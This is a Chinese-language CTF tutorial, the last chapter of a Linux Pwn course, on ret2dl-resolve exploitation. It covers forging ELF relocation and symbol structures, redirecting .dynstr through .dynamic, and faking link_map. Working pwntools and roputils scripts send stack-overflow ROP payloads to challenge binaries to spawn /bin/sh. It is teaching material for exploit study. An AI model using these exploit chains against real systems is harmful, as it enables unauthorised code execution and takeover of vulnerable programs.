Linux Pwn入門教程系列分享已接近尾聲,本套課程是作者依據i春秋Pwn入門課程中的技術分類,並結合近幾年賽事中出現的題目和文章整理出一份相對完整的Linux Pwn教程。
教程僅針對i386/amd64下的Linux Pwn常見的Pwn手法,如棧,堆,整數溢出,格式化字符串,條件競爭等進行介紹,所有環境都會封裝在Docker鏡像當中,並提供調試用的教學程序,來自歷年賽事的原題和帶有注釋的python腳本。
課程回顧>>
Linux Pwn入門教程第九章:stack canary與繞過的思路
Linux Pwn入門教程第十章:針對函數重定位流程的相關測試(上)
今天i春秋與大家分享的是Linux Pwn入門教程中的最后一節內容:針對函數重定位流程的相關測試(下),閱讀用時約20分鍾。
注:文末有本套課程所整理的全部內容,大家可收藏進行系統學習。
32位下的ret2dl-resolve
通過一系列冗長的源碼閱讀+調試分析,我們捋了一遍符號重定位的流程,現在我們要站在測試角度看待這個流程了。從上面的分析結果中我們知道其實最終影響解析的是函數的名字,那么如果我們強行把write改成system呢?我們來試一下。
我們強行修改內存數據,然后繼續運行,發現劫持got表成功,此時write表項是system的地址。
那么我們是不是可以修改dynstr里面的數據呢?通過查看內存屬性,我們很不幸地發現.rel.plt. .dynsym .dynstr所在的內存區域都不可寫。
這樣一來,我們能夠改變的就只有reloc_arg了。基於上面的分析,我們的思路是在內存中偽造Elf32_Rel和Elf32_Sym兩個結構體,並手動傳遞reloc_arg使其指向我們偽造的結構體,讓Elf32_Sym.st_name的偏移值指向預先放在內存中的字符串system完成攻擊。為了地址可控,我們首先進行棧劫持並跳轉到0x0804834B。
為此我們必須在bss段構造一個新的棧,以便棧劫持完成后程序不會崩潰。ROP鏈如下:
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.update(os = 'linux', arch = 'i386')
start_addr = 0x08048350
read_plt = 0x08048310
write_plt = 0x08048340
write_plt_without_push_reloc_arg = 0x0804834b
leave_ret = 0x08048482
pop3_ret = 0x08048519
pop_ebp_ret = 0x0804851b
new_stack_addr = 0x0804a200 #bss與got表相鄰,_dl_fixup中會降低棧后傳參,設置離bss首地址遠一點防止參數寫入非法地址出錯
io = remote('172.17.0.2', 10001)
payload = ""
payload += 'A'*140 #padding
payload += p32(read_plt) #調用read函數往新棧寫值,防止leave; retn到新棧后出現ret到地址0上導致出錯
payload += p32(pop3_ret) #read函數返回后從棧上彈出三個參數
payload += p32(0) #fd = 0
payload += p32(new_stack_addr) #buf = new_stack_addr
payload += p32(0x400) #size = 0x400
payload += p32(pop_ebp_ret) #把新棧頂給ebp,接下來利用leave指令把ebp的值賦給esp
payload += p32(new_stack_addr)
payload += p32(leave_ret)
io.send(payload) #此時程序會停在我們使用payload調用的read函數處等待輸入數據
payload = ""
payload += "AAAA" #leave = mov esp, ebp; pop ebp,占位用於pop ebp
payload += p32(write_plt_without_push_reloc_arg) #按照我們的測試方案,強制程序對write函數重定位,reloc_arg由我們手動放入棧中
payload += p32(0x18) #手動傳遞write的reloc_arg,調用write
payload += p32(start_addr) #函數執行完后返回start
payload += p32(1) #fd = 1
payload += p32(0x08048000) #buf = ELF程序加載開頭,write會輸出ELF
payload += p32(4) #size = 4
io.send(payload)
測試結果:
我們可以看到調用成功了。我們發現其實跳轉到write_plt_without_push_reloc_arg上,還是會直接跳轉到PLT[0],所以我們可以把這個地址改成PLT[0]的地址。
接下來我們開始着手在新的棧上偽造兩個結構體:
write_got = 0x0804a018
new_stack_addr = 0x0804a500 #bss與got表相鄰,_dl_fixup中會降低棧后傳參,設置離bss首地址遠一點防止參數寫入非法地址出錯
relplt_addr = 0x080482b0 #.rel.plt的首地址,通過計算首地址和新棧上我們偽造的結構體Elf32_Rel偏移構造reloc_arg
dymsym_addr = 0x080481cc #.dynsym的首地址,通過計算首地址和新棧上我們偽造的Elf32_Sym結構體偏移構造Elf32_Rel.r_info
dynstr_addr = 0x0804822c #.dynstr的首地址,通過計算首地址和新棧上我們偽造的函數名字符串system偏移構造Elf32_Sym.st_name
fake_Elf32_Rel_addr = new_stack_addr + 0x50 #在新棧上選擇一塊空間放偽造的Elf32_Rel結構體,結構體大小為8字節
fake_Elf32_Sym_addr = new_stack_addr + 0x5c #在偽造的Elf32_Rel結構體后面接上偽造的Elf32_Sym結構體,結構體大小為0x10字節
binsh_addr = new_stack_addr + 0x74 #把/bin/sh\x00字符串放在最后面
fake_reloc_arg = fake_Elf32_Rel_addr - relplt_addr #計算偽造的reloc_arg
fake_r_info = ((fake_Elf32_Sym_addr - dymsym_addr)/0x10) << 8 | 0x7 #偽造r_info,偏移要計算成下標,除以Elf32_Sym的大小,最后一字節為0x7
fake_st_name = new_stack_addr + 0x6c - dynstr_addr #偽造的Elf32_Sym結構體后面接上偽造的函數名字符串system
fake_Elf32_Rel_data = ""
fake_Elf32_Rel_data += p32(write_got) #r_offset = write_got,以免重定位完畢回填got表的時候出現非法內存訪問錯誤
fake_Elf32_Rel_data += p32(fake_r_info)
fake_Elf32_Sym_data = ""
fake_Elf32_Sym_data += p32(fake_st_name)
fake_Elf32_Sym_data += p32(0) #后面的數據直接套用write函數的Elf32_Sym結構體,具體成員變量含義自行搜索
fake_Elf32_Sym_data += p32(0)
fake_Elf32_Sym_data += p32(0x12)
我們把新棧的地址向后調整了一點,因為在調試深入到_dl_fixup的時候發現某行指令試圖對got表寫入,而got表正好就在bss的前面,緊接着bss,為了防止運行出錯,我們進行了調整。此外,需要注意的是偽造的兩個結構體都要與其首地址保持對齊。完成了結構體偽造之后,我們將這些內容放在新棧中,調試的時候確認整個偽造的鏈條正確,pwn it!
64位下的ret2dl-resolve
與32位不同,在64位下,雖然_dl_fixup函數的邏輯沒有改變,但是許多相關的變量和結構體都有了變化。例如在glibc/sysdeps/x86_64/dl-runtime.c中定義了reloc_offset和reloc_index:
#define reloc_offset reloc_arg * sizeof (PLTREL)
#define reloc_index reloc_arg
#include <elf/dl-runtime.c>
我們可以推斷出reloc_arg已經不像32位中是作為一個偏移值存在,而是作為一個數組下標存在。此外,兩個關鍵的結構體也做出了調整:Elf32_Rel升級為Elf64_Rela, Elf32_Sym升級為Elf64_Sym,這兩個結構體的大小均為0x18。
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
Elf64_Sxword r_addend; /* Addend */
} Elf64_Rela;
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
此外,_dl_runtime_resolve的實現位於glibc/sysdeps/x86_64/dl-trampoline.h中,其代碼加了宏定義之后可讀性很差,核心內容仍然是調用_dl_fixup,此處不再分析。
最后,在64位下進行ret2dl-resolve還有一個問題,即我們在分析源碼時提到但是應用中卻忽略的一個潛在數組越界:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
{
const ElfW(Half) *vernum =
(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
這里會使用reloc->r_info的高位作為下標產生了ndx,然后在link_map的成員數組變量l_versions中取值作為version。為了在偽造的時候正確定位到sym,r_info必然會較大。在32位的情況下,由於程序的映射較為緊湊, reloc->r_info的高24位導致vernum數組越界的情況較少。
由於程序映射的原因,vernum數組首地址后面有大片內存都是以0x00填充,測試導致reloc->r_info的高24位過大后從vernum數組中獲取到的ndx有很大概率是0,從而由於ndx異常導致l_versions數組越界的幾率也較低。我們可以對照源碼,IDA調試進入_dl_fixup后,將斷點下在if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)附近。
中斷后切換到匯編
單步運行到movzx edx, word ptr [edx+esi*2]一行
觀察edx的值,此處為0x0804827c, edx+esi*2 = 0x08048284,查看程序的內存映射情況。
一直到地址0x0804b000都是可讀的,所以esi,也就是reloc->r_info的高24位最高可以達到0x16c2,考慮到.dymsym與.bss的間隔,這個允許范圍基本夠用。繼續往下看:
此時的edi = 0xf7fa9918,[edi+170h]保存的值為0Xf7f7eb08,其后連續可讀的地址最大值為0xf7faa000,因此mov ecx, [edx+4]一行,按照之前幾行匯編代碼的算法,只要取出的edx值不大於(0xf7faa000-0xf7f7eb08)/0x10 = 0x2b4f,version = &l->l_versions[ndx];就不會產生非法內存訪問。仔細觀察會發現0x0804827c~0x0804b000之間幾乎所有的2字節word型數據都符合要求。因此,大部分情況下32位的題目很少會產生ret2dl-resolve在此處造成的段錯誤。
而對於64位,我們用相同的方法調試本節的例子~/XMAN 2016-level3_64/level3_64會發現由於我們常用的bss段被映射到了0x600000之后,而dynsym的地址仍然在0x400000附近,r_info的高位將會變得很大,再加上此時vernum也在0x400000附近,vernum[ELFW(R_SYM) (reloc->r_info)]將會有很大概率落在在0x400000~0x600000間的不可讀區域。
從而產生一個段錯誤。為了防止出現這個錯誤,我們需要修改判斷流程,使得l->l_info[VERSYMIDX (DT_VERSYM)]為0,從而繞開這塊代碼。而l->l_info[VERSYMIDX (DT_VERSYM)]在64位中的位置就是link_map+0x1c8(對應的,32位下為link_map+0xe4),所以我們需要泄露link_map地址並將link_map置為0。
64位下的ret2dl-resolve與32位下的ret2dl-resolve除了上述一些變化之外,exp構造流程並沒有什么區別,在此處不再贅述,詳細腳本可見於附件。
理論上來說,ret2dl-resolve對於所有存在棧溢出,沒有Full RELRO(如果開啟了Full RELRO,所有符號將會在運行時被全部解析,也就不存在_dl_fixup了)且有一個已知確定的棧地址(可以通過stack pivot劫持棧到已知地址)的程序都適用。但是我們從上面的64位ret2dl-resolve中可以看到其必須泄露link_map的地址才能完成利用,對於32位程序來說也可能出現同樣的問題。如果出現了不存在輸出的棧溢出程序,我們就沒辦法用這種套路了,那我們該怎么辦呢?接下來的幾節我們將介紹一些不依賴泄露的攻擊手段。
使用ROPutils簡化攻擊步驟
從上面32位和64位的攻擊腳本我們不難看出來,雖然構造payload的過程很繁瑣,但是實際上大部分代碼的格式都是固定的,我們完全可以把它們封裝成一個函數進行調用。當然,我們還可以當一把懶人,直接用別人寫好的庫。例如項目ROPutils(https://github.com/inaz2/roputils)
閱讀代碼roputils.py,其大部分我們會用到的東西都在ROP*和FormatStr這幾個類中,不過ROPutils也提供了其他的輔助工具類和函數。當然,在本節中我們只會介紹和ret2dl-resolve相關的一些函數的用法,不做源碼分析和過多的介紹。
我們可以直接把roputils.py和自己寫的腳本放在同一個文件夾下以使用其中的功能。以~/XMAN 2016-level3/level4為例。其實我們會發現fake dl-resolve並不一定需要進行棧劫持,我們只要確保偽造的link_map所在地址已知,且地址能被作為參數傳入_dl_fixup即可。我們先來構造一個棧溢出,調用read讀取偽造的link_map到.bss中。
from roputils import *
#為了防止命名沖突,這個腳本全部只使用roputils中的代碼。如果需要使用pwntools中的代碼需要在import roputils前import pwn,以使得roputils中的ROP覆蓋掉pwntools中的ROP
rop = ROP('./level4') #ROP繼承了ELF類,下面的section, got, plt都是調用父類的方法
bss_addr = rop.section('.bss')
read_got = rop.got('read')
read_plt = rop.plt('read')
offset = 140
io = Proc(host = '172.17.0.2', port = 10001) #roputils中這里需要顯式指定參數名
buf = rop.fill(offset) #fill用於生成填充數據
buf += rop.call(read_plt, 0, bss_addr, 0x100) #call可以通過某個函數的plt地址方便地進行調用
buf += rop.dl_resolve_call(bss_addr+0x20, bss_addr) #dl_resolve_call有一個參數base和一個可選參數列表*args。base為偽造的link_map所在地址,*args為要傳遞給被劫持調用的函數的參數。這里我們將"/bin/sh\x00"放置在bss_addr處,link_map放置在bss_addr+0x20處
io.write(buf)
然后我們直接用dl_resolve_data生成偽造的link_map並發送
buf = rop.string('/bin/sh')
buf += rop.fill(0x20, buf) #如果fill的第二個參數被指定,相當於將第二個參數命名的字符串填充至指定長度
buf += rop.dl_resolve_data(bss_addr+0x20, 'system') #dl_resolve_data的參數也非常簡單,第一個參數是偽造的link_map首地址,第二個參數是要偽造的函數名
buf += rop.fill(0x100, buf)
io.write(buf)
然后我們直接使用io.interact(0)就可以打開一個shell了。
關於roputils的用法可以參考其github倉庫中的examples,其他練習程序不再提供對應的roputils寫法的腳本。
在.dynamic節中偽造.dynstr節地址
在32位的ret2dl-resolve一節中我們已經發現,ELF開發小組為了安全,設置.rel.plt. .dynsym .dynstr三個重定位相關的節區均為不可寫。然而ELF文件中有一個.dynamic節,其中保存了動態鏈接器所需要的基本信息,而我們的.dynstr也屬於這些基本信息中的一個。
如果一個程序沒有開啟RELRO(即checksec顯示No RELRO).dynamic節是可寫的。(Partial RELRO和Full RELRO會在程序加載完成時設置.dynamic為不可寫,因此盡管readelf顯示其為可寫也不可相信)
.dynamic節中只包含Elf32/64_Dyn結構體類型的數據,這兩個結構體定義在glibc/elf/elf.h下:
typedef struct
{
Elf32_Sword d_tag; /* Dynamic entry type */
union
{
Elf32_Word d_val; /* Integer value */
Elf32_Addr d_ptr; /* Address value */
} d_un;
} Elf32_Dyn;
typedef struct
{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
} d_un;
} Elf64_Dyn;
從結構體的定義我們可以看出其由一個d_tag和一個union類型組成,union中的兩個變量會隨着不同的d_tag進行切換,我們通過readelf看一下.dynstr的d_tag。
其標記為0x05,union變量顯示為值0x0804820c。我們看一下內存中.dynamic節中.dynstr對應的Elf32_Dyn結構體和指針指向的數據。
因此,我們只需要在棧溢出后程序中仍然存在至少一個未執行過的函數,我們就可以修改.dynstr對應結構體中的地址,從而使其指向我們偽造的.dynstr數據,進而在解析的時候解析出我們想要的函數。
我們以32位的程序為例,打開~/fake_dynstr32/fake_dynstr32。
這個程序滿足了我們需要的一切條件——No RELRO,棧溢出發生在vuln中,exit不會被調用,因此我們可以用上述方法進行攻擊。首先我們把所有的字符串從里面拿出來,並且把exit替換成system。
call_exit_addr = 0x08048495
read_plt = 0x08048300
start_addr = 0x08048350
dynstr_d_ptr_address = 0x080496a4
fake_dynstr_address = 0x08049800
fake_dynstr_data = "\x00libc.so.6\x00_IO_stdin_used\x00system\x00\x00\x00\x00\x00\x00read\x00__libc_start_main\x00__gmon_start__\x00GLIBC_2.0\x00"
注意由於memset的一部分也會被system覆蓋掉,我們應該把剩余的部分設置為\x00,防止后面的符號偏移值錯誤。memset由於是在read函數運行之前運行的,所以它的符號已經沒用了,可以被覆蓋掉。
接下來我們構造ROP鏈依次寫入偽造的dynstr字符串和其保存在Elf32_Dyn中的地址。
io = remote("172.17.0.2", 10001)
payload = ""
payload += 'A'*22 #padding
payload += p32(read_plt) #修改.dynstr對應的Elf32_Dyn.d_ptr
payload += p32(start_addr)
payload += p32(0)
payload += p32(dynstr_d_ptr_address)
payload += p32(4)
io.send(payload)
sleep(0.5)
io.send(p32(fake_dynstr_address)) #新的.dynstr地址
sleep(0.5)
payload = ""
payload += 'A'*22 #padding
payload += p32(read_plt) #在內存中偽造一塊.dynstr字符串
payload += p32(start_addr)
payload += p32(0)
payload += p32(fake_dynstr_address)
payload += p32(len(fake_dynstr_data)+8) #長度是.dynstr加上8,把"/bin/sh\x00"接在后面
io.send(payload)
sleep(0.5)
io.send(fake_dynstr_data+"/bin/sh\x00") #把/bin/sh\x00接在后面
sleep(0.5)
此時還剩下函數exit未被調用,我們通過前面的步驟偽造了.dynstr,將其中的exit改成了system,因此根據_dl_fixup的原理,此時函數將會解析system的首地址並返回到system上。
64位下的利用方式與32位下並沒有區別,此處不再進行詳細分析。
fake link_map
由於各種保護方式的普及,現在能碰到No RELRO的程序已經很少了,因此上節所述的攻擊方式能用上的機會並不多,所以這節我們介紹另外一種方式——通過偽造link_map結構體進行攻擊。
在前面的源碼分析中,我們主要把目光集中在未解析過的函數在_dl_fixup的流程中而忽略了另外一個分支。
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
struct link_map *l, ElfW(Word) reloc_arg)
{
………… //變量定義,初始化等等
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) //判斷函數是否被解析過。此前我們一直利用未解析過的函數的結構體,所以這里的if始終成立
…………
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
…………
}
else
{
/* We already found the symbol. The module (and therefore its load
address) is also known. */
value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
result = l;
}
…………
}
通過注釋我們可以看到之前的if起的是判斷函數是否被解析過的作用,如果函數被解析過,_dl_fixup就不會調用_dl_lookup_symbol_x對函數進行重定位,而是直接通過宏DL_FIXUP_MAKE_VALUE計算出結果。這邊用到了link_map的成員變量l_addr和Elf32/64_Sym的成員變量st_value。這里的l_addr是實際映射地址和原來指定的映射地址的差值,st_value根據對應節的索引值有不同的含義。
不過在這里我們並不需要關心那么多,我們只需要知道如果我們能使l->l_addr + sym->st_value指向一個函數的在內存中的實際地址,那么我們就能返回到這個函數上。但是問題來了,如果我們知道了system在內存中的實際地址,我們何苦用那么麻煩的方式跳轉到system上呢?所以答案是我們不知道。
我們需要做的是讓l->l_addr和sym->st_value其中之一落在got表的某個已解析的函數上(如__libc_start_main),而另一個則設置為system函數和這個函數的偏移值。既然我們都偽造了link_map,那么顯然l_addr是我們可以控制的,而sym根據我們的源碼分析,它的值最終也是從link_map中獲得的(很多節區地址,包括.rel.plt, .dynsym, dynstr都是從中取值,更多細節可以對比調試時的link_map數據與源碼進行學習)
const ElfW(Sym) *const symtab
= (const void *) D_PTR (l, l_info[DT_SYMTAB]);
const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
const PLTREL *const reloc
= (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
所以這兩個值我們都可以進行偽造。此時只要我們知道libc的版本,就能算出system與已解析函數之間的偏移了。
說到這里可能有人會想到,既然偽造的link_map那么厲害,那么我們為什么不在前面的dl-resolve中直接偽造出.dynstr的地址,而要通過一條冗長的求值鏈返回到system呢?我們來看一下上面的這行代碼:
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
根據位於glibc/include/Link.h中的link_map結構體定義,這里的l_scope是一個當前link_map的查找范圍數組。我們從link_map結構體的定義可以看出來其實這是一個雙鏈表,每一個link_map元素都保存了一個函數庫的信息。當查找某個符號的時候,實際上是通過遍歷整個雙鏈表,在每個函數庫中進行的查詢。顯然,我們不可能知道libc的link_map地址,所以我們沒辦法偽造l_scope,也就沒辦法偽造整個link_map使流程進入_dl_lookup_symbol_x,只能選擇讓流程進入“函數已被解析過”的分支。
回到主題,我們為了讓函數流程繞過_dl_lookup_symbol_x,必須偽造sym使得ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0,根據sym的定義,我們就得偽造symtab和reloc->r_info,所以我們得偽造DT_SYMTAB, DT_JMPREL,此外,我們得偽造strtab為可讀地址,所以還得偽造DT_STRTAB,所以我們需要偽造link_map前0xf8個字節的數據,需要關注的分別是位於link_map+0的l_addr,位於link_map+0x68的DT_STRTAB指針,位於link_map+0x70的DT_SYMTAB指針和位於link_map+0xF8的DT_JMPREL指針。
此外,我們需要偽造Elf64_Sym結構體,Elf64_Rela結構體,由於DT_JMPREL指向的是Elf64_Dyn結構體,我們也需要偽造一個這樣的結構體。當然,我們得讓reloc_offset為0.為了偽造的方便,我們可以選擇讓l->l_addr為已解析函數內存地址和system的偏移,sym->st_value為已解析的函數地址的指針-8,即其got表項-8。(這部分在源碼中似乎並沒有體現出來,但是調試的時候發現實際上會+8,原因不明)我們還是以~/XMAN 2016-level3_64/level3_64為例進行分析。
首先我們來構造一個fake link_map:
fake_link_map_data = ""
fake_link_map_data += p64(offset) # +0x00 l_addr offset = system - __libc_start_main
fake_link_map_data += '\x00'*0x60
fake_link_map_data += p64(DT_STRTAB) #+0x68 DT_STRTAB
fake_link_map_data += p64(DT_SYMTAB) #+0x70 DT_SYMTAB
fake_link_map_data += '\x00'*0x80
fake_link_map_data += p64(DT_JMPREL) #+0xf8 DT_JMPREL
后面的link_map數據由於我們用不上就不構造了。根據我們的分析,我們留出來四個8字節數據區用來填充相應的數據,其他部分都置為0.
接下來我們偽造出三個結構體
fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0) #d_tag
fake_Elf64_Dyn += p64(0) #d_ptr
fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(0) #r_offset
fake_Elf64_Rela += p64(7) #r_info
fake_Elf64_Rela += p64(0) #r_addend
fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0) #st_name
fake_Elf64_Sym += 'AAAA' #st_info, st_other, st_shndx
fake_Elf64_Sym += p64(main_got-8) #st_value
fake_Elf64_Sym += p64(0) #st_size
顯然我們必須把r_info設置為7以通過檢查。為了使ELFW(ST_VISIBILITY) (sym->st_other)不為0從而躲過_dl_lookup_symbol_x,我們直接把st_other設置為非0.st_other也必須為非0以避開_dl_lookup_symbol_x,進入我們希望要的分支。
我們注意到fake_link_map中間有許多用\x00填充的空間,這些地方實際上寫啥都不影響我們的攻擊,因此我們充分利用空間,把三個結構體跟/bin/sh\x00也塞進去。
offset = 0x253a0 #system - __libc_start_main
fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0) #d_tag 從link_map中找.rel.plt不需要用到標簽, 隨意設置
fake_Elf64_Dyn += p64(fake_link_map_addr + 0x18) #d_ptr 指向偽造的Elf64_Rela結構體,由於reloc_offset也被控制為0,不需要偽造多個結構體
fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(fake_link_map_addr - offset) #r_offset rel_addr = l->addr+reloc_offset,直接指向fake_link_map所在位置令其可讀寫就行
fake_Elf64_Rela += p64(7) #r_info index設置為0,最后一字節必須為7
fake_Elf64_Rela += p64(0) #r_addend 隨意設置
fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0) #st_name 隨意設置
fake_Elf64_Sym += 'AAAA' #st_info, st_other, st_shndx st_other非0以避免進入重定位符號的分支
fake_Elf64_Sym += p64(main_got-8) #st_value 已解析函數的got表地址-8,-8體現在匯編代碼中,原因不明
fake_Elf64_Sym += p64(0) #st_size 隨意設置
fake_link_map_data = ""
fake_link_map_data += p64(offset) #l_addr,偽造為兩個函數的地址偏移值
fake_link_map_data += fake_Elf64_Dyn
fake_link_map_data += fake_Elf64_Rela
fake_link_map_data += fake_Elf64_Sym
fake_link_map_data += '\x00'*0x20
fake_link_map_data += p64(fake_link_map_addr) #DT_STRTAB 設置為一個可讀的地址
fake_link_map_data += p64(fake_link_map_addr + 0x30)#DT_SYMTAB 指向對應結構體數組的地址
fake_link_map_data += "/bin/sh\x00"
fake_link_map_data += '\x00'*0x78
fake_link_map_data += p64(fake_link_map_addr + 0x8) #DT_JMPREL 指向對應數組結構體的地址
現在我們需要做的就是棧劫持,偽造參數跳轉到_dl_fixup了。前兩者好說,_dl_fixup地址也在got表中的第2項。但是問題是這是一個保存了函數地址的地址,我們沒辦法放在棧上用ret跳過去,難道要再用一次萬能gadgets嗎?不,我們可以選擇這個:
把這行指令地址放到棧上,用ret就可以跳進_fix_up.現在我們需要的東西都齊了,只要把它們組裝起來,pwn it!
